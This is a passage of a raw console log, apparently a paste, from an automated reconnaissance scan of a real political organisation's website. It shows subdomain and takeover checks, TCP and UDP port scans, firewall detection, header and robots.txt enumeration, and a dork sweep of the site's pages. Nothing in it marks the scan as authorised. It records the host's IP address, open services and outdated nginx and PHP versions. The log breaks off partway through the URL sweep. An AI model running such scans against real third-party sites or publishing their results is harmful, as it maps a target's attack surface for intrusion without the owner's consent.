  633. Running collector: HackerTarget... Done (1 host)
  634. Running collector: Google Transparency Report... Done (0 hosts)
  635. Running collector: VirusTotal... Skipped
  636.  -> Key 'virustotal' has not been set
  637. Running collector: Shodan... Skipped
  638.  -> Key 'shodan' has not been set
  639. Running collector: Netcraft... Done (0 hosts)
  640.  
  641. Resolving 29 unique hosts...
  642. 192.155.88.60   .njoathkeepers.org
  643. 192.155.88.60   njoathkeepers.org
  644. 192.155.88.60   www.njoathkeepers.org
  645.  
  646. Found subnets:
  647.  
  648.  - 192.155.88.0-255  : 3 hosts
  649.  
  650. Wrote 3 hosts to:
  651.  
  652.  - file:///root/aquatone/njoathkeepers.org/hosts.txt
  653.  - file:///root/aquatone/njoathkeepers.org/hosts.json
  654.                            __
  655.   ____ _____ ___  ______ _/ /_____  ____  ___
  656.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  657. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  658. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  659.         /_/  takeover v0.5.0 - by @michenriksen
  660.  
  661. Loaded 3 hosts from /root/aquatone/njoathkeepers.org/hosts.json
  662. Loaded 25 domain takeover detectors
  663.  
  664. Identifying nameservers for njoathkeepers.org... Done
  665. Using nameservers:
  666.  
  667.  - 2604:180:1::F02F:2C21
  668.  - 66.55.82.13
  669.  
  670. Checking hosts for domain takeover vulnerabilities...
  671.  
  672. Finished checking hosts:
  673.  
  674.  - Vulnerable     : 0
  675.  - Not Vulnerable : 3
  676.  
  677. Wrote 0 potential subdomain takeovers to:
  678.  
  679.  - file:///root/aquatone/njoathkeepers.org/takeovers.json
  680.  
  681.                            __
  682.   ____ _____ ___  ______ _/ /_____  ____  ___
  683.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  684. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  685. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  686.         /_/  scan v0.5.0 - by @michenriksen
  687.  
  688. Loaded 3 hosts from /root/aquatone/njoathkeepers.org/hosts.json
  689.  
  690. Probing 2 ports...
  691. 80/tcp    192.155.88.60   .njoathkeepers.org, njoathkeepers.org, www.njoathkeepers.org
  692.  
  693. Wrote open ports to file:///root/aquatone/njoathkeepers.org/open_ports.txt
  694. Wrote URLs to file:///root/aquatone/njoathkeepers.org/urls.txt
  695.                            __
  696.   ____ _____ ___  ______ _/ /_____  ____  ___
  697.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  698. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  699. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  700.         /_/  gather v0.5.0 - by @michenriksen
  701. #######################################################################################################################################
  702. Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-30 07:51 EDT
  703. Warning: 192.155.88.60 giving up on port because retransmission cap hit (2).
  704. Nmap scan report for njoathkeepers.org (192.155.88.60)
  705. Host is up (0.48s latency).
  706. rDNS record for 192.155.88.60: mail.nycpatriot.org
  707. Not shown: 460 closed ports, 6 filtered ports
  708. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  709. PORT     STATE SERVICE
  710. 80/tcp   open  http
  711. 143/tcp  open  imap
  712. 465/tcp  open  smtps
  713. 587/tcp  open  submission
  714. 993/tcp  open  imaps
  715. 3333/tcp open  dec-notes
  716. 5554/tcp open  sgi-esphttp
  717. 6667/tcp open  irc
  718. 7777/tcp open  cbt
  719. 8001/tcp open  vcom-tunnel
  720. #######################################################################################################################################
  721. Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-30 07:51 EDT
  722. Nmap scan report for njoathkeepers.org (192.155.88.60)
  723. Host is up.
  724. rDNS record for 192.155.88.60: mail.nycpatriot.org
  725.  
  726. PORT     STATE         SERVICE
  727. 53/udp   open|filtered domain
  728. 67/udp   open|filtered dhcps
  729. 68/udp   open|filtered dhcpc
  730. 69/udp   open|filtered tftp
  731. 88/udp   open|filtered kerberos-sec
  732. 123/udp  open|filtered ntp
  733. 137/udp  open|filtered netbios-ns
  734. 138/udp  open|filtered netbios-dgm
  735. 139/udp  open|filtered netbios-ssn
  736. 161/udp  open|filtered snmp
  737. 162/udp  open|filtered snmptrap
  738. 389/udp  open|filtered ldap
  739. 520/udp  open|filtered route
  740. 2049/udp open|filtered nfs
  741. #######################################################################################################################################
  742.                                  ^     ^
  743.         _   __  _   ____ _   __  _    _   ____
  744.        ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  745.       | V V // o // _/ | V V // 0 // 0 // _/
  746.       |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
  747.                                 <
  748.                                  ...'
  749.  
  750.     WAFW00F - Web Application Firewall Detection Tool
  751.  
  752.     By Sandro Gauci && Wendel G. Henrique
  753.  
  754. Checking http://njoathkeepers.org
  755. Generic Detection results:
  756. No WAF detected by the generic detection
  757. Number of requests: 13
  758.  
  759. + -- --=[Checking if X-Content options are enabled on njoathkeepers.org...
  760.  
  761. + -- --=[Checking if X-Frame options are enabled on njoathkeepers.org...
  762.  
  763. + -- --=[Checking if X-XSS-Protection header is enabled on njoathkeepers.org...
  764.  
  765. + -- --=[Checking HTTP methods on njoathkeepers.org...
  766. HTTP/1.1 405 Not Allowed
  767.  
  768. + -- --=[Checking if TRACE method is enabled on njoathkeepers.org...
  769.  
  770. + -- --=[Checking for META tags on njoathkeepers.org...
  771.  
  772. + -- --=[Checking for open proxy on njoathkeepers.org...
  773. <p>
  774. <center><img src="images/fate.png" alt="fate">
  775. <p>
  776. <center>
  777. 1996 - 2006
  778. </center>
  779. </td>
  780. </table>
  781. </body>
  782. </html>
  783.  
  784. + -- --=[Enumerating software on njoathkeepers.org...
  785. Server: nginx/1.8.1
  786. X-Powered-By: PHP/5.5.38-1~dotdeb+7.1
  787.  
  788. + -- --=[Checking if Strict-Transport-Security is enabled on njoathkeepers.org...
  789.  
  790. + -- --=[Checking for Flash cross-domain policy on njoathkeepers.org...
  791.  
  792. + -- --=[Checking for Silverlight cross-domain policy on njoathkeepers.org...
  793.  
  794. + -- --=[Checking for HTML5 cross-origin resource sharing on njoathkeepers.org...
  795.  
  796. + -- --=[Retrieving robots.txt on njoathkeepers.org...
  797. Disallow: /calendar/action~month/
  798. Disallow: /calendar/action~week/
  799. Disallow: /calendar/action~stream/
  800. Disallow: /calendar/action~undefined/
  801. Disallow: /calendar/action~http:/
  802. Disallow: /calendar/action~default/
  803. Disallow: /calendar/action~poster/
  804. Disallow: /calendar/action~*/
  805. Disallow: /*controller=ai1ec_exporter_controller*
  806. Disallow: /*/action~*/
  807. + -- --=[Retrieving sitemap.xml on njoathkeepers.org...
  808.  
  809. + -- --=[Checking cookie attributes on njoathkeepers.org...
  810.  
  811. + -- --=[Checking for ASP.NET Detailed Errors on njoathkeepers.org...
  812. var tznfrontjs_vars = {"plugins_url":"http:\/\/www.njoathkeepers.org\/wp-content\/plugins","error_message":"An error has occured.","datepicker_format":"yy-mm-dd","task_hist_show":"Show History","task_hist_hide":"Hide History"};
  813. <body class="error404">
  814. var es_widget_page_notices = {"es_email_notice":"Please enter email address","es_success_message":"Successfully Subscribed.","es_success_notice":"Your subscription was successful! Kindly check your mailbox and confirm your subscription. If you don't see the email within a few minutes, check the spam\/junk folder.","es_email_exists":"Email Address already exists!","es_error":"Oops.. Unexpected error occurred.","es_invalid_email":"Invalid email address","es_try_later":"Please try after some time","es_ajax_url":"http:\/\/www.njoathkeepers.org\/wp-admin\/admin-ajax.php"};
  815. #######################################################################################################################################
  816. ---------------------------------------------------------------------------------------------------------------------------------------
  817.  
  818. [ ! ] Starting SCANNER INURLBR 2.1 at [30-06-2018 07:53:44]
  819. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  820. It is the end user's responsibility to obey all applicable local, state and federal laws.
  821. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  822.  
  823. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-njoathkeepers.org.txt  ]
  824. [ INFO ][ DORK ]::[ site:njoathkeepers.org ]
  825. [ INFO ][ SEARCHING ]:: {
  826. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.ua ]
  827.  
  828. [ INFO ][ SEARCHING ]::
  829. -[:::]
  830. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  831.  
  832. [ INFO ][ SEARCHING ]::
  833. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  834. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.ae ID: 010479943387663786936:wjwf2xkhfmq ]
  835.  
  836. [ INFO ][ SEARCHING ]::
  837. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  838.  
  839. [ INFO ][ TOTAL FOUND VALUES ]:: [ 54 ]
  840.  
  841.  
  842.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  843. |_[ + ] [ 0 / 54 ]-[07:54:07] [ - ]
  844. |_[ + ] Target:: [ http://www.njoathkeepers.org/ ]
  845. |_[ + ] Exploit::
  846. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  847. |_[ + ] More details::  / -  / , ISP:
  848. |_[ + ] Found:: UNIDENTIFIED
  849.  
  850.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  851. |_[ + ] [ 1 / 54 ]-[07:54:10] [ - ]
  852. |_[ + ] Target:: [ http://www.njoathkeepers.org/calendar/ ]
  853. |_[ + ] Exploit::
  854. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  855. |_[ + ] More details::  / -  / , ISP:
  856. |_[ + ] Found:: UNIDENTIFIED
  857.  
  858.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  859. |_[ + ] [ 2 / 54 ]-[07:54:14] [ - ]
  860. |_[ + ] Target:: [ http://www.njoathkeepers.org/members/ ]
  861. |_[ + ] Exploit::
  862. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  863. |_[ + ] More details::  / -  / , ISP:
  864. |_[ + ] Found:: UNIDENTIFIED
  865.  
  866.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  867. |_[ + ] [ 3 / 54 ]-[07:54:16] [ - ]
  868. |_[ + ] Target:: [ http://www.njoathkeepers.org/login/ ]
  869. |_[ + ] Exploit::
  870. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  871. |_[ + ] More details::  / -  / , ISP:
  872. |_[ + ] Found:: UNIDENTIFIED
  873.  
  874.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  875. |_[ + ] [ 4 / 54 ]-[07:54:19] [ - ]
  876. |_[ + ] Target:: [ http://www.njoathkeepers.org/the-oath/ ]
  877. |_[ + ] Exploit::
  878. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  879. |_[ + ] More details::  / -  / , ISP:
  880. |_[ + ] Found:: UNIDENTIFIED
  881.  
  882.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  883. |_[ + ] [ 5 / 54 ]-[07:54:22] [ - ]
  884. |_[ + ] Target:: [ http://www.njoathkeepers.org/press-coverage/ ]
  885. |_[ + ] Exploit::
  886. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  887. |_[ + ] More details::  / -  / , ISP:
  888. |_[ + ] Found:: UNIDENTIFIED
  889.  
  890.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  891. |_[ + ] [ 6 / 54 ]-[07:54:25] [ - ]
  892. |_[ + ] Target:: [ http://www.njoathkeepers.org/event/850/ ]
  893. |_[ + ] Exploit::
  894. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  895. |_[ + ] More details::  / -  / , ISP:
  896. |_[ + ] Found:: UNIDENTIFIED
  897.  
  898.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  899. |_[ + ] [ 7 / 54 ]-[07:54:27] [ - ]
  900. |_[ + ] Target:: [ http://www.njoathkeepers.org/our-members/ ]
  901. |_[ + ] Exploit::
  902. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  903. |_[ + ] More details::  / -  / , ISP:
  904. |_[ + ] Found:: UNIDENTIFIED
  905.  
  906.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  907. |_[ + ] [ 8 / 54 ]-[07:54:30] [ - ]
  908. |_[ + ] Target:: [ http://www.njoathkeepers.org/event/885/ ]
  909. |_[ + ] Exploit::
  910. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  911. |_[ + ] More details::  / -  / , ISP:
  912. |_[ + ] Found:: UNIDENTIFIED
  913.  
  914.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  915. |_[ + ] [ 9 / 54 ]-[07:54:33] [ - ]
  916. |_[ + ] Target:: [ http://www.njoathkeepers.org/599-2/ ]
  917. |_[ + ] Exploit::
  918. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  919. |_[ + ] More details::  / -  / , ISP:
  920. |_[ + ] Found:: UNIDENTIFIED
  921.  
  922.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  923. |_[ + ] [ 10 / 54 ]-[07:54:36] [ - ]
  924. |_[ + ] Target:: [ http://www.njoathkeepers.org/timothy-locke/ ]
  925. |_[ + ] Exploit::
  926. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  927. |_[ + ] More details::  / -  / , ISP:
  928. |_[ + ] Found:: UNIDENTIFIED
  929.  
  930.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  931. |_[ + ] [ 11 / 54 ]-[07:54:39] [ - ]
  932. |_[ + ] Target:: [ http://www.njoathkeepers.org/mailing-list/ ]
  933. |_[ + ] Exploit::
  934. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  935. |_[ + ] More details::  / -  / , ISP:
  936. |_[ + ] Found:: UNIDENTIFIED
  937.  
  938.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  939. |_[ + ] [ 12 / 54 ]-[07:54:42] [ - ]
  940. |_[ + ] Target:: [ http://www.njoathkeepers.org/sanctuary-cities/ ]
  941. |_[ + ] Exploit::
  942. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  943. |_[ + ] More details::  / -  / , ISP:
  944. |_[ + ] Found:: UNIDENTIFIED
  945.  
  946.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  947. |_[ + ] [ 13 / 54 ]-[07:54:45] [ - ]
  948. |_[ + ] Target:: [ http://www.njoathkeepers.org/event/march-against-sharia/ ]
  949. |_[ + ] Exploit::
  950. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  951. |_[ + ] More details::  / -  / , ISP:
  952. |_[ + ] Found:: UNIDENTIFIED
  953.  
  954.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  955. |_[ + ] [ 14 / 54 ]-[07:54:48] [ - ]
  956. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/venues/clifton-billiards/ ]
  957. |_[ + ] Exploit::
  958. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  959. |_[ + ] More details::  / -  / , ISP:
  960. |_[ + ] Found:: UNIDENTIFIED
  961.  
  962.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  963. |_[ + ] [ 15 / 54 ]-[07:54:51] [ - ]
  964. |_[ + ] Target:: [ http://www.njoathkeepers.org/event/2017-nj-safe/ ]
  965. |_[ + ] Exploit::
  966. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  967. |_[ + ] More details::  / -  / , ISP:
  968. |_[ + ] Found:: UNIDENTIFIED
  969.  
  970.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  971. |_[ + ] [ 16 / 54 ]-[07:54:54] [ - ]
  972. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/njsafe-conference/ ]
  973. |_[ + ] Exploit::
  974. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  975. |_[ + ] More details::  / -  / , ISP:
  976. |_[ + ] Found:: UNIDENTIFIED
  977.  
  978.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  979. |_[ + ] [ 17 / 54 ]-[07:54:56] [ - ]
  980. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/venues/shop-rite/ ]
  981. |_[ + ] Exploit::
  982. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  983. |_[ + ] More details::  / -  / , ISP:
  984. |_[ + ] Found:: UNIDENTIFIED
  985.  
  986.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  987. |_[ + ] [ 18 / 54 ]-[07:54:59] [ - ]
  988. |_[ + ] Target:: [ http://www.njoathkeepers.org/nj-oath-keepers-gear/ ]
  989. |_[ + ] Exploit::
  990. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  991. |_[ + ] More details::  / -  / , ISP:
  992. |_[ + ] Found:: UNIDENTIFIED
  993.  
  994.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  995. |_[ + ] [ 19 / 54 ]-[07:55:02] [ - ]
  996. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/venues/vincentown-diner/ ]
  997. |_[ + ] Exploit::
  998. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  999. |_[ + ] More details::  / -  / , ISP:
  1000. |_[ + ] Found:: UNIDENTIFIED
  1001.  
  1002.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1003. |_[ + ] [ 20 / 54 ]-[07:55:05] [ - ]
  1004. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/venues/castle-consulting/ ]
  1005. |_[ + ] Exploit::
  1006. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1007. |_[ + ] More details::  / -  / , ISP:
  1008. |_[ + ] Found:: UNIDENTIFIED
  1009.  
  1010.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1011. |_[ + ] [ 21 / 54 ]-[07:55:08] [ - ]
  1012. |_[ + ] Target:: [ http://www.njoathkeepers.org/new-jersey-billboard-project/ ]
  1013. |_[ + ] Exploit::
  1014. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1015. |_[ + ] More details::  / -  / , ISP:
  1016. |_[ + ] Found:: UNIDENTIFIED
  1017.  
  1018.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1019. |_[ + ] [ 22 / 54 ]-[07:55:11] [ - ]
  1020. |_[ + ] Target:: [ http://www.njoathkeepers.org/support-the-nj-oath-keepers/ ]
  1021. |_[ + ] Exploit::
  1022. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1023. |_[ + ] More details::  / -  / , ISP:
  1024. |_[ + ] Found:: UNIDENTIFIED
  1025.  
  1026.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1027. |_[ + ] [ 23 / 54 ]-[07:55:14] [ - ]
  1028. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/range-training-event/ ]
  1029. |_[ + ] Exploit::
  1030. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1031. |_[ + ] More details::  / -  / , ISP:
  1032. |_[ + ] Found:: UNIDENTIFIED
  1033.  
  1034.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1035. |_[ + ] [ 24 / 54 ]-[07:55:17] [ - ]
  1036. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/nj-state-meeting/ ]
  1037. |_[ + ] Exploit::
  1038. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1039. |_[ + ] More details::  / -  / , ISP:
  1040. |_[ + ] Found:: UNIDENTIFIED
  1041.  
  1042.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1043. |_[ + ] [ 25 / 54 ]-[07:55:19] [ - ]
  1044. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/category/meet-and-greet/ ]
  1045. |_[ + ] Exploit::
  1046. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1047. |_[ + ] More details::  / -  / , ISP:
  1048. |_[ + ] Found:: UNIDENTIFIED
  1049.  
  1050.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1051. |_[ + ] [ 26 / 54 ]-[07:55:22] [ - ]
  1052. |_[ + ] Target:: [ http://www.njoathkeepers.org/event/cape-may-county-meeting/ ]
  1053. |_[ + ] Exploit::
  1054. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1055. |_[ + ] More details::  / -  / , ISP:
  1056. |_[ + ] Found:: UNIDENTIFIED
  1057.  
  1058.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1059. |_[ + ] [ 27 / 54 ]-[07:55:25] [ - ]
  1060. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/venues/gun-for-hire/ ]
  1061. |_[ + ] Exploit::
  1062. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1063. |_[ + ] More details::  / -  / , ISP:
  1064. |_[ + ] Found:: UNIDENTIFIED
  1065.  
  1066.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1067. |_[ + ] [ 28 / 54 ]-[07:55:28] [ - ]
  1068. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/warren-county-meeting/ ]
  1069. |_[ + ] Exploit::
  1070. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1071. |_[ + ] More details::  / -  / , ISP:
  1072. |_[ + ] Found:: UNIDENTIFIED
  1073.  
  1074.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1075. |_[ + ] [ 29 / 54 ]-[07:55:31] [ - ]
  1076. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/venues/montvale-street-fair/ ]
  1077. |_[ + ] Exploit::
  1078. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1079. |_[ + ] More details::  / -  / , ISP:
  1080. |_[ + ] Found:: UNIDENTIFIED
  1081.  
  1082.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1083. |_[ + ] [ 30 / 54 ]-[07:55:34] [ - ]
  1084. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/march-against-sharia/ ]
  1085. |_[ + ] Exploit::
  1086. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1087. |_[ + ] More details::  / -  / , ISP:
  1088. |_[ + ] Found:: UNIDENTIFIED
  1089.  
  1090.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1091. |_[ + ] [ 31 / 54 ]-[07:55:36] [ - ]
  1092. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/venues/autumn-lights-festival/ ]
  1093. |_[ + ] Exploit::
  1094. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1095. |_[ + ] More details::  / -  / , ISP:
  1096. |_[ + ] Found:: UNIDENTIFIED
  1097.  
  1098.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1099. |_[ + ] [ 32 / 54 ]-[07:55:39] [ - ]
  1100. |_[ + ] Target:: [ http://www.njoathkeepers.org/ny-oath-keepers-2016-awards-dinner/ ]
  1101. |_[ + ] Exploit::
  1102. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1103. |_[ + ] More details::  / -  / , ISP:
  1104. |_[ + ] Found:: UNIDENTIFIED
  1105.  
  1106.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1107. |_[ + ] [ 33 / 54 ]-[07:55:42] [ - ]
  1108. |_[ + ] Target:: [ http://www.njoathkeepers.org/event/10th-annual-wounded-warrior-day/ ]
  1109. |_[ + ] Exploit::
  1110. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1111. |_[ + ] More details::  / -  / , ISP:
  1112. |_[ + ] Found:: UNIDENTIFIED
  1113.  
  1114.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1115. |_[ + ] [ 34 / 54 ]-[07:55:45] [ - ]
  1116. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/north-jersey-regional-meeting/ ]
  1117. |_[ + ] Exploit::
  1118. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1119. |_[ + ] More details::  / -  / , ISP:
  1120. |_[ + ] Found:: UNIDENTIFIED
  1121.  
  1122.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1123. |_[ + ] [ 35 / 54 ]-[07:55:48] [ - ]
  1124. |_[ + ] Target:: [ http://www.njoathkeepers.org/event/west-milford-autumn-lights-festival/ ]
  1125. |_[ + ] Exploit::
  1126. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1127. |_[ + ] More details::  / -  / , ISP:
  1128. |_[ + ] Found:: UNIDENTIFIED
  1129.  
  1130.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1131. |_[ + ] [ 36 / 54 ]-[07:55:51] [ - ]
  1132. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/honoring-unforgotten-heroes-ceremony/ ]
  1133. |_[ + ] Exploit::
  1134. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1135. |_[ + ] More details::  / -  / , ISP:
  1136. |_[ + ] Found:: UNIDENTIFIED
  1137.  
  1138.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1139. |_[ + ] [ 37 / 54 ]-[07:55:54] [ - ]
  1140. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/venues/schuetzen-park-senator-lounge/ ]
  1141. |_[ + ] Exploit::
  1142. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.8.1  X-Powered-By: PHP/5.5.38-1~dotdeb+7.1, IP:192.155.88.60:80
  1143. |_[ + ] More details::  / -  / , ISP:
  1144. |_[ + ] Found:: UNIDENTIFIED
  1145.  
  1146.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1147. |_[ + ] [ 38 / 54 ]-[07:55:57] [ - ]
  1148. |_[ + ] Target:: [ http://www.njoathkeepers.org/events/event/joint-county-monthly-meeting/ ]
  1149. |_[ + ] Exploit::
